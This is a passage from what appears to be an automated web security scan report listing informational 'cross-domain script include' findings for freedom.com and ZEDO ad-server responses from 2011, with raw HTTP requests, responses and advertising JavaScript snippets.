Connection: close
Content-Length: 1870

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCust
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=79C8ECB&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/"><\/script>
...[SNIP]...

18.130. http://common.onset.freedom.com/images/arrow_next.gif/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /images/arrow_next.gif/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/arrow_next.gif/ HTTP/1.1
Host: common.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE];

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:25:13 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n20), ms iad-agg-n20 ( sfo-agg-n16), ms sfo-agg-n16 ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 29 Jan 2011 05:25:43 GMT
Age: 0
Content-Length: 6565
Content-Type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15136/slf.js" type="text/javascript"></script>
...[SNIP]...

18.131. http://common.onset.freedom.com/images/arrow_prev.gif/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /images/arrow_prev.gif/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/arrow_prev.gif/ HTTP/1.1
Host: common.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE];

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:25:13 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n8), ms sfo-agg-n8 ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 29 Jan 2011 05:25:43 GMT
Age: 0
Content-Length: 6565
Content-Type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15136/slf.js" type="text/javascript"></script>
...[SNIP]...

18.132. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=audiencescience300x250&s=2&z=0.10010791243985295 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=4:2:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:3:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813#711378|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:44 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=236
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:44 GMT
Connection: close
Content-Length: 2273

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='audiencescie
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/cm.rev_bostonherald/;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

18.133. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=realmedia728x90&s=2&z=0.688481671968475 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,2,9:826,187,14:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=12:5:6:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:0:12:5:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:39:45 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=155
Expires: Fri, 28 Jan 2011 22:42:20 GMT
Date: Fri, 28 Jan 2011 22:39:45 GMT
Connection: close
Content-Length: 2306

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=728x90;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

18.134. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3389143997337669 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1; FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,2,9:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=16:7:8:3:8:0:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:5,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:826,187,14:951,11,14:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:9:7:8:3:0:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:56:10 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=32
Expires: Fri, 28 Jan 2011 22:56:42 GMT
Date: Fri, 28 Jan 2011 22:56:10 GMT
Connection: close
Content-Length: 2304

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&m=6&tp=8&d=j&t=n"><\/script>
...[SNIP]...

18.135. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.31822958169505 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; FFcat=826,187,9:951,7,9:1220,101,9; FFad=0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:31 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:31 GMT
Connection: close
Content-Length: 2167

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

18.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.24530343222431839 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=1:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:32 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:951,2,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:1:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Fri, 28 Jan 2011 22:00:22 GMT
Date: Fri, 28 Jan 2011 21:57:32 GMT
Connection: close
Content-Length: 2108

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848" type="text/javascript"><\/script>
...[SNIP]...

18.137. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.925386450253427 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=7:0:12:5:2:6:3:1:1:0; 